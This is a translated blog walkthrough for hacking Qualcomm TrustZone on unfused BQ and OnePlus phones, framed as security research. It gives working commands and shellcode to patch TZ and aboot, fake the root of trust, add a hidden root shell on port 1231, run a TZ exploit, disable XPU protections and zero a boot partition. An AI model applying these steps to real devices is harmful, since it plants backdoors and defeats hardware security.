Bring Light To The Darkness P3 (Debugging TrustZone), translated

April 24, 2021

Original title: Bring Light To The Darkness P3
Original URL: https://bkerler.github.io/2020/08/03/bring-light-to-the-darkness-p3/

This article is a translation; please point out anything that was translated incorrectly.


Building an environment for debugging Qualcomm TrustZone (AArch64)

Introduction

  • Set up a TrustZone debugging environment on a phone whose secure boot has not been broken (unfused), and start hacking
  • Works for both end-user devices and development boards; in the end we will have full control from EL0 through EL3
  • An unbroken phone (refers to secure boot; presumably meaning not unlocked) using MSM8974, MSM8976, MSM8953, MSM8937 and similar chips, or a phone based on a Qualcomm X6, X8 or X9 modem; I use a BQ X Pro and a OnePlus One here
  • Python 3.x installed (Linux)

1. Verify whether the device is vulnerable to cold patching

1.1 Install the latest adb and fastboot

~ $ mkdir ~/bin
~ $ cd ~/bin
~/bin $ wget https://dl.google.com/android/repository/platform-tools-latest-linux.zip; unzip platform-tools-latest-linux.zip; rm platform-tools-latest-linux.zip
~/bin $ cd ..

After adding it to your PATH and restarting, adb should be available

1.2 Install my Qualcomm Emergency Download (EDL) tool

~ $ git clone https://github.com/bkerler/EDL edl
~ $ cd edl
~/edl $ python3 -m pip install pyusb pyserial
~/edl $ sudo sh -c 'echo "blacklist qcserial" >> /etc/modprobe.d/blacklist.conf'
~/edl $ sudo cp Drivers/51-edl.rules /etc/udev/rules.d
~/edl $ sudo cp Drivers/50-android.rules /etc/udev/rules.d
~/edl $ sudo udevadm control -R

1.3 Extract the EDL loader matching your device from the firmware, put it into the Loaders directory and name it in the form [msmid]_[pkhash 8 bytes].bin, or just use the fhloaderparse.py script

In practice, go to the Loaders directory at https://github.com/bkerler/EDL, find the .bin file matching your phone and copy it into Loaders

For example, copy the BQ X Pro loader directly

~/edl $ cp 000460E100000000_cc3153a80293939b_FHPRG_bqXPro.bin Loaders

For example, copy the OnePlus One loader directly

~/edl $ cp 007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin Loaders

Example of using the fhloaderparse script

~/edl $ mkdir test
~/edl $ cp emmc_prog_firehose.bin test
~/edl $ ./fhloaderparse.py test

1.4 Power off the phone, then hold Volume+ and Volume- together and plug in USB; the phone will enter 9008 mode (many devices sold in China cannot enter it this way; the fastest way is to open the device and short the test point)

1.5 Use the Qualcomm firmware cold patch tool to check whether the device is vulnerable

~/edl $ ./edl.py -secureboot
  
Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.

__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: sahara
Device is in EDL mode .. continuing.
Library.sahara - 
------------------------
HWID:              0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH:           0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial:            0x0d7e015b
SBL Version:       0x00000000

Library.sahara - Unfused device detected, so any loader should be fine...
Library.sahara - Trying loader: Loaders/qualcomm/007BC0E100000000_cc3153a80293939b_FHPRG_OnePlusOne.bin
Successfully uploaded programmer :)
  
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - Peek: Address(0xfc4b83f8),Size(0x4)
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.

If the last line says Secure boot disabled, the device can be patched and hacked
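As an added example (not part of the original post or of the EDL project), a small Python parser that reads the output of the `edl.py -secureboot` run above, decides from the Sec_Boot fuse lines whether secure boot is really enabled, and derives the [msmid]_[pkhash 8 bytes] loader name from step 1.3. The sample text is the session shown above, embedded inline; the regexes and the fused/unfused rule are assumptions based on that output.

```python
import re

# Constructed sample: the relevant lines of the `edl.py -secureboot` session above.
SAMPLE_OUTPUT = """\
HWID:              0x007bc0e100000000 (MSM_ID:0x007bc0e1,OEM_ID:0x0000,MODEL_ID:0x0000)
PK_HASH:           0xcc3153a80293939b90d02d3bf8b23e0292e452fef662c74998421adad42a380f
Serial:            0x0d7e015b
Sec_Boot0 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot1 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot2 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Sec_Boot3 PKHash-Index:0 OEM_PKHash: False Auth_Enabled: False Use_Serial: False
Secure boot disabled.
"""

# Regexes are assumptions matching the line layout seen in the session above.
FIELD_RE = re.compile(r"^(HWID|PK_HASH|Serial):\s+0x([0-9a-fA-F]+)")
SECBOOT_RE = re.compile(
    r"^Sec_Boot(\d+) PKHash-Index:(\d+) OEM_PKHash: (True|False) "
    r"Auth_Enabled: (True|False) Use_Serial: (True|False)"
)


def parse_secureboot(text):
    """Collect HWID / PK_HASH / Serial and one entry per Sec_Boot fuse line."""
    info = {"sec_boot": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            info[m.group(1).lower()] = m.group(2).lower()
            continue
        m = SECBOOT_RE.match(line)
        if m:
            info["sec_boot"].append({
                "slot": int(m.group(1)),
                "pkhash_index": int(m.group(2)),
                "oem_pkhash": m.group(3) == "True",
                "auth_enabled": m.group(4) == "True",
                "use_serial": m.group(5) == "True",
            })
    return info


def msm_id(info):
    """MSM_ID is the upper 32 bits of the 64-bit HWID (0x007bc0e1 in the sample)."""
    return int(info["hwid"].zfill(16)[:8], 16)


def loader_name(info):
    """Loader prefix from step 1.3: 16 upper-case HWID hex digits, '_', first 8 bytes of PK_HASH."""
    return info["hwid"].zfill(16).upper() + "_" + info["pk_hash"][:16]


def secure_boot_enabled(info):
    """Assumed rule: the device is fused if any Sec_Boot slot has Auth_Enabled or an OEM PK hash."""
    return any(e["auth_enabled"] or e["oem_pkhash"] for e in info["sec_boot"])
```

With the sample above the loader name comes out as 007BC0E100000000_cc3153a80293939b, which is exactly the loader the session picked from Loaders/qualcomm.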

2. Obtain the device firmware

2.1 Dump it directly from the device

Dump the boot, aboot and tz partitions (note: this is done in 9008 mode)

~/edl $ ./edl.py -r boot boot.img

Qualcomm Sahara / Firehose Client (c) B.Kerler 2018-2019.
    
__main__ - Trying with loaders in Loader directory ...
__main__ - Waiting for the device
__main__ - Device detected :)
__main__ - Mode detected: firehose
    
    
Library.firehose - TargetName=MSM8974
Library.firehose - MemoryName=eMMC
Library.firehose - Version=1
Library.firehose - 
Reading from physical partition 0, sector 196608, sectors 32768
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Dumped sector 196608 with sector count 32768 as boot.img.

If you see main - USB desync, please rerun command !, just run the command again

~/edl $ ./edl.py -r aboot aboot.img
~/edl $ ./edl.py -r tz tz.img

Then go back up to the directory above edl

~/edl $ cd ..

Another option is to download the official firmware (factory image?) and attack that instead

For example, for the 64-bit BQ Aquaris X Pro MSM8953, 2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip, at the following URL (no longer available)

https://storage.googleapis.com/otas/2017/Smartphones/Bardock_Pro/OTA_Official/Oreo/2.7.2/2.7.2_20190620-1410-bardockpro_bq-user-2169-Fastboot-FW.zip

For the 32-bit OnePlus One MSM8974, cm-13.1.2-ZNH2KAS3P0-bacon-signed-fastboot.zip, at the following URL (still available)

https://www.androidfilehost.com/?fid=24591000424960109

3. Download and install my Qualcomm attack tools

3.1 Download the latest version from GitHub

~ $ git clone https://github.com/bkerler/qcpatchtools
~ $ cd qcpatchtools

3.2 Install the capstone and keystone engines (tools)

~/qcpatchtools $ git clone https://github.com/keystone-engine/keystone --recursive
~/qcpatchtools $ cd keystone && mkdir -p build && cd build && cmake ..
~/qcpatchtools/keystone/build $ ../make-lib.sh
~/qcpatchtools/keystone/build $ sudo make install
~/qcpatchtools/keystone/build $ cd ../bindings/python
~/qcpatchtools/keystone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/keystone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf keystone
~/qcpatchtools $ git clone https://github.com/aquynh/capstone --recursive
~/qcpatchtools $ cd capstone
~/qcpatchtools/capstone $ ./make.sh
~/qcpatchtools/capstone $ sudo ./make.sh install
~/qcpatchtools/capstone $ cd bindings/python
~/qcpatchtools/capstone/bindings/python $ sudo python3 setup.py build install
~/qcpatchtools/capstone/bindings/python $ cd ~/qcpatchtools
~/qcpatchtools $ rm -rf capstone

3.3 Install the required third-party packages

~/qcpatchtools $ sudo pip3 install -r requirements.txt

3.4 You can now leave the qcpatchtools folder

~/qcpatchtools $ cd ~

4. Modify the (base) kernel

Using the 64-bit BQ Aquaris X Pro MSM8953 as an example

4.1 Download the kernel source matching the phone and build it

~ $ git clone https://github.com/bq/aquaris-X-Pro.git
~ $ mv aquaris-X-Pro kernel
~ $ cd kernel
~/kernel $ git checkout tags/2.5.1_20190114-1551
~/kernel $ cd ..
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9
~ $ cd aarch64-linux-android-4.9
~/aarch64-linux-android-4.9 $ git checkout 22f053ccdfd0d73aafcceff3419a5fe3c01e878b
~/aarch64-linux-android-4.9 $ cd ..
~ $ mkdir KERNEL_OUT

4.2 Download my patch, which adds a custom svc handler (see Gal Beniamini's blog), removes the XPU restrictions and adds extra logging of tz svc calls (i.e., apply it to the kernel source tree with the command below)

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_bq_msm8953.diff

4.3 Build the custom kernel

~ $ make -C kernel O=../KERNEL_OUT ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android- bardockpro_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm64 CROSS_COMPILE=../aarch64-linux-android-4.9/bin/aarch64-linux-android-
~ $ cp KERNEL_OUT/arch/arm64/boot/Image.gz-dtb zkernel

Using the 32-bit OnePlus One MSM8974 as an example (the steps are basically the same as above, only the commands differ slightly)

4.1 Build the official kernel

~ $ git clone https://github.com/LineageOS/android_kernel_oneplus_msm8974 -b cm-13.0 kernel
~ $ git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-linux-androideabi-4.9
~ $ cd arm-linux-androideabi-4.9
~/arm-linux-androideabi-4.9 $ git checkout 10ddded24ecdbdeaa4ac57d49962ca06e9c1ceaa
~/arm-linux-androideabi-4.9 $ cd ..
~ $ mkdir KERNEL_OUT

4.2 Patch the kernel with my tool

~ $ patch -p1 -d kernel < qcpatchtools/patches/kernel_oneplus_msm8974.diff

4.3 Build the custom kernel

~ $ make -C kernel O=../KERNEL_OUT ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi- cyanogenmod_bacon_defconfig
~ $ make -j4 O=../KERNEL_OUT/ -C kernel ARCH=arm CROSS_COMPILE=../arm-linux-androideabi-4.9/bin/arm-linux-androideabi-
~ $ cp KERNEL_OUT/arch/arm/boot/zImage zkernel

zImage-dtb is not copied here because the OnePlus is different: it uses a modified dtb, which has already been extracted from the boot image

5. Root the (base) kernel

To get my own rooted kernel, I used my Android_Universal tool and the EDL scripts on a locked retail BQ X Pro to enable tz debugging via adb, and then added a custom reverse shell

5.1 Install the android_universal toolset

~ $ git clone https://github.com/bkerler/android_universal

5.2 Root the boot partition, then add a fake root of trust to pass AVBv1 verification

~ $ cd edl
~/edl $ cp boot.img ../android_universal
~/edl $ cd ~/android_universal

For the 32-bit OnePlus One MSM8974

The OnePlus One is signed with Google's test keys, so the boot.img.signed file can be flashed directly

~/android_universal $ ./makeramdisk.sh -fn boot.img -c -fs 1

For the 64-bit BQ Aquaris X Pro MSM8953

Since MSM8953 devices use Android Verified Boot v1 (AVBv1), boot.img.rotfake has to be flashed

~/android_universal $ ./makeramdisk.sh -fn boot.img -c

5.3 makeramdisk pauses temporarily (waiting for further action, i.e., for you to add custom files to the boot image); open a new terminal and run the following

~/android_universal $ cp ../zkernel tmp/kernel 
~/android_universal $ cd ..

Then go back to the makeramdisk terminal and press Enter; the boot image is then packed and signed

6. Prepare the tz shellcode (for cold patching or hot patching) used for code injection

6.1 Save the appropriate shellcode to shellcode.txt

For the 32-bit OnePlus One MSM8974

# R0 = writeflag (0=read, 0x22=write), R1=addr, R2=value, R3=readmemptr
PUSH {R4-R6,LR}
CMP  R0, #0x22
BEQ  write
LDR  R0, [R1]
STR  R0, [R3]
B exit
write:
STR  R2, [R1]
exit:
POP {R4-R6,PC}

For the 64-bit BQ Aquaris X Pro MSM8953

# X0 = writeflag (0=read, 0x22=write), X1=addr, W2=value
STP X28, X27, [SP,#-0x60]!
STP X26, X25, [SP,#0x10]
STP X24, X23, [SP,#0x20]
STP X22, X21, [SP,#0x30]
STP X20, X19, [SP,#0x40]
STP X29, X30, [SP,#0x50]
MOV X29, SP

# arg0 == 0x22: write the dword in arg2 (W2) to the address in arg1 (X1)
# arg0 == 0:    read the dword at the address in arg1 (X1) and return it in W0
CMP  W0, #0x22
BEQ  write
LDR  W0, [X1]
B exit
write:
STR  W2, [X1]

exit:
LDP X29, X30, [SP,#0x50]
LDP X20, X19, [SP,#0x40]
LDP X22, X21, [SP,#0x30]
LDP X24, X23, [SP,#0x20]
LDP X26, X25, [SP,#0x10]
LDP X28, X27, [SP],#0x60
RET

7. Patch tz with the shellcode above so that we can inject code

7.1 Patch the shellcode into an empty area of tz (i.e., store the shellcode in an unused code cave)

For the 32-bit OnePlus One MSM8974

~/qcpatchtools $ ./tz_coldpatch32.py -in tz.mbn -out tz.patched -sc shellcode.txt
      Found svc_entry_offset: 0xfe826104.
      Possible code cave at 0xfe809c8d, file offset: 0x30b8c
      svc code: 0x0C06 (svc 0x03 cmd 0x06)
      Code to patch:70b5222802d00868106000e00a6070bd
      Patching done, saved as tz.patched

For the 64-bit BQ Aquaris X Pro MSM8953

~/qcpatchtools $ ./tz_coldpatch64.py -in ../edl/tz.img -out tz.img.patched -sc shellcode.txt
     Found code cave at 0x8657871c, file offset: 0x5c71c, svc code: 0x0200020D
     Code to patch:1f88007160000054200040b9c0035fd6220000b9c0035fd6
     Patching done, saved as tz.img.patched

7.2 Sign the patched tz image with a custom private key

~/qcpatchtools $ ./qc_signer.py -t qsee -in tz.img.patched -out tz.signed

8. Patch aboot so that a custom ramdisk can be used

This is only needed when AVB verification is present; for the OnePlus MSM8974 it can be skipped

8.1 Patch aboot

For the 32-bit OnePlus One MSM8974

  • Nothing to do

For the 64-bit BQ Aquaris X Pro MSM8953

First patch aboot to bypass verification

~/qcpatchtools $ ./aboot_rot64.py -in ../edl/aboot.img -out aboot.patched

Then sign the patched aboot

~/qcpatchtools $ ./qc_signer.py -in aboot.patched -out aboot.signed -t appsbl
~/qcpatchtools $ rm aboot.patched

9. Flash the modified files

For the 32-bit OnePlus One MSM8974

9.1 Copy the boot and tz images to the EDL folder

~/qcpatchtools $ cp tz.signed ../edl/
~/qcpatchtools $ cd ..
~ $ cp android_universal/boot.img.signed edl/

9.2 Power off, then hold Volume+ and Volume- together to enter 9008 mode (as noted above, shorting the test point is the most convenient for devices sold in China), and flash boot and tz

~ $ cd edl/
~/edl $ ./edl.py -w boot boot.img.signed
~/edl $ ./edl.py -w tz tz.signed

9.3 Reboot the phone

For the 64-bit BQ Aquaris X Pro MSM8953

9.1 Likewise, copy aboot, boot and tz to the EDL folder

~/qcpatchtools $ cd ~
~ $ cp qcpatchtools/aboot.signed qcpatchtools/tz.signed edl/
~ $ cp android_universal/boot.rotfake edl/
~ $ cd edl

9.2 Flash aboot, boot and tz

~/edl $ ./edl.py -w boot boot.rotfake
~/edl $ ./edl.py -w aboot aboot.signed
~/edl $ ./edl.py -w tz tz.signed
~/edl $ cd ..

9.3 If the phone reboots into USB PID 0x900E or 0x9006 mode, open the device, remove the battery, disconnect USB, short the eMMC CLK pin to ground, reconnect USB, release the short and put the battery back. The phone then enters 9008 mode normally and you can flash away

9.4 Reboot the phone

10. Test whether the device (kernel) was rooted successfully

10.1 If flashing TZ failed

Case 1: the device stays in 0x9006 mode; unbrick it as follows

First run the following command

~/edl $ ./edl.py -vid 0x05c6 -pid 0x9006

The device then shows up as a block device (mounted?); to unbrick it you have to flash a working tz, so back up the sbl1 partition and then erase it

~/edl $ dd if=/dev/disk/by-part-label/sbl1 of=sbl1.bin
~/edl $ dd if=/dev/zero of=/dev/disk/by-part-label/sbl1

Then switch to 9008 mode and write the working sbl1 and tz images

~/edl $ ./edl.py -w sbl1 sbl1.img
~/edl $ ./edl.py -w tz tz.img

Copy the custom adb key

~/edl $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh

Case 2: the device stays in 0x900E mode

This shows as the device not booting with a red LED on (breathing light?), which means the image signature is wrong. You have to short DAT0 to GND while powering on (without the battery) to enter 9008 mode, then insert the battery and reflash the firmware with edl

~/edl $ ./edl.py -w tz tz.img

10.2 Copy the custom adb key

~/edl $ cd ../android_universal
~/android_universal $ ./install_adb_key.sh

To get a root shell, first connect over TCP to port 1231 on the device, which drops you into the hidden root shell; there is no prompt after connecting, just type a command and press Enter to run it

$ adb shell
bardock-pro:/ $ toybox nc 0.0.0.0 1231
root@bardock-pro:/ # id
      uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
root@bardock-pro:/ # uname -a
      Linux localhost 3.18.71-perf-g18b9c9b33ae-dirty #1 SMP PREEMPT Tue Feb 26 14:18:30 CET 2019 aarch64
root@bardock-pro:/ # getprop | grep 8.1
      [net.tcp.buffersize.lte]: [2097152,4194304,8388608,262144,524288,1048576]
      [net.tcp.buffersize.wifi]: [524288,2097152,4194304,262144,524288,1048576]
      [ril.ecclist]: [911,112,*911,#911,000,08,110,999,118,119,122]
      [ril.ecclist1]: [911,112,*911,#911,000,08,110,999,118,119]
      [ro.bootimage.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      [ro.boottime.adbd]: [5047811195]
      [ro.boottime.cnd]: [6851364840]
      [ro.boottime.cnss-daemon]: [6891754944]
      [ro.boottime.keystore]: [6871139580]
      [ro.boottime.mediadrm]: [6872873851]
      [ro.boottime.nfc_hal_service]: [4955175831]
      [ro.boottime.nvtool]: [6861805830]
      [ro.boottime.nxpnfc_hal_svc]: [4962930831]
      [ro.boottime.ril-daemon]: [6887123642]
      [ro.boottime.storaged]: [6882149788]
      [ro.boottime.time_daemon]: [6853684111]
      [ro.boottime.tombstoned]: [6930821819]
      [ro.boottime.vndservicemanager]: [4090654841]
      [ro.build.description]: [bardockpro_bq-user 8.1.0 OPM1.171019.026 1492 release-keys]
      [ro.build.fingerprint]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1492:user/release-keys]
      [ro.build.version.base_os]: [bq/bardock-pro/bardock-pro:8.1.0/OPM1.171019.026/1422:user/release-keys]
      [ro.build.version.release]: [8.1.0]
      [ro.com.google.gmsversion]: [8.1_201810]

11. Talking to tz (reading tz memory)

For the 32-bit OnePlus One MSM8974

Example of reading a dword from tz memory (address 0xFE82CDA0)

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bacon:/ # cd /data/local/tmp
root@bacon:/data/local/tmp # ./qcxploit exploit8974
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82CDA0 4
0xFE805738
385780FE

For the 64-bit BQ Aquaris X Pro MSM8953

Example of reading a dword from tz memory (address 0x8657871c)

$ adb forward tcp:1231 tcp:1231
$ adb push qcxploit /data/local/tmp
$ nc localhost 1231
root@bardock-pro:/ # cd /data/local/tmp
root@bardock-pro:/data/local/tmp # ./qcxploit readmem 8657871c 4
  Sending SVC: 0x200020d
  Data:
  0xA9BA6FFC
  FC6FBAA9

12. How to patch tz (writing instructions into the code cave)

For the 32-bit OnePlus One MSM8974

12.1 Disable the XPU

root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0xFC48B080 0x0
      Sending SVC: 0x10, CMD: 0x2
      IOCTL RES: 0x0000001E

root@bacon:/ # /data/local/tmp/qcxploit exploit8974
      MSM8974 TZ 0-day exploit by B.Kerler 2017
      ----------------------------------------------------------
      Disable NS Blacklist
      Zeroing out IMEM
      Refreshing NS Blacklist
      Done exploiting

12.2 Read/write

  • Read a dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x0 0x[addr_to_read] 0x[bufferaddr]
  • Write a dword
root@bacon:/ # /data/local/tmp/qcxploit svcreg32 03 06 03 0x22 0x[addr_to_write] 0x[value_to_write]
  • Read after disabling the XPU
root@bacon:/ # /data/local/tmp/qcxploit readmem [addr_to_read] [length_to_read]
  • Write after disabling the XPU
root@bacon:/ # /data/local/tmp/qcxploit writemem [addr_to_write] [value_to_write_as_hexstring]

12.3 Generate shellcode

~/qcpatchtools $ Tools/asmtools.py -asm arm,thumb -in ShellCode/shellcode_examples/read_write_shellcode_arm.txt
      CPU: arm, MODE: thumb
      70b5222802d00868106000e00a6070bd

12.4 Inject the shellcode (0xfe809c8d is the code cave offset found in section 7.1)

root@bacon:/data/local/tmp # ./qcxploit writemem FE809C8D 70b5222802d00868106000e00a6070bd

12.5 Run the injected shellcode

root@bacon:/data/local/tmp # ./qcxploit svcreg32 06 03 03 0 0xFE808796 0xFE82830c
          Sending SVC: 0xc, CMD: 0xe
          IOCTL RES: 0x0000003E
root@bacon:/data/local/tmp # ./qcxploit readmem 0xFE82830C 4
          Memory read:
         70B5042B

12.6 If execution raises an exception, check /d/tzdbg/log

For the 64-bit BQ Aquaris X Pro MSM8953

12.1 Disable the XPU

Disable HWIO_BIMC_S_DDR0_XPU_SCR_ADDR (optional, but this disables the tz key)

root@bardock-pro:/ # ./qcxploit svcreg 200020D 4 22 44a000 13f 0

Disable HWIO_BIMC_S_DDR0_XPU_CR_ADDR

root@bardock-pro:/ # ./qcxploit svcreg 200020D 4 22 44a080 19e 0

Disable HWIO_OCIMEM_MPU_XPU_SCR_ADDR (optional, but this disables the tz key)

root@bardock-pro:/ # ./qcxploit svcreg 200020D 4 22 53000 13f 0

Disable HWIO_OCIMEM_MPU_XPU_CR_ADDR

root@bardock-pro:/ # ./qcxploit svcreg 200020D 4 22 53080 11f 0

Disable write protection by modifying the protected memory region: not the region where the tz code starts, but where it ends (write 0x866f0000 to HWIO_BIMC_S_DDR0_XPU_PRT2_START0_ADDR); this is a tz bug

root@bardock-pro:/ # ./qcxploit svcreg 200020D 4 22 44a340 866f0000 0

12.2 Enable the tz debug log

root@bardock-pro:/ # mount -t debugfs debugfs /d/
root@bardock-pro:/ # ls /d/tzdbg

12.3 Now any code can be uploaded into tz with devmem; here writing into tz via svc cmd 0x200030F is used as the example

root@bardock-pro:/ # ./busybox devmem 0x865ef918
root@bardock-pro:/ # ./busybox devmem 0x865ef918 32 0x865630fc
root@bardock-pro:/ # ./busybox devmem 0x865ef918 32 0x86572214
root@bardock-pro:/ # ./busybox devmem 0x8657221C 32 0xD2800000
root@bardock-pro:/ # ./qcxploit svcreg 200030F 4 0 53000 13e 0

ENJOY

Comments

  1. kk kk
    2021-04-24 20:14

    Great article!! Pity I can't understand it.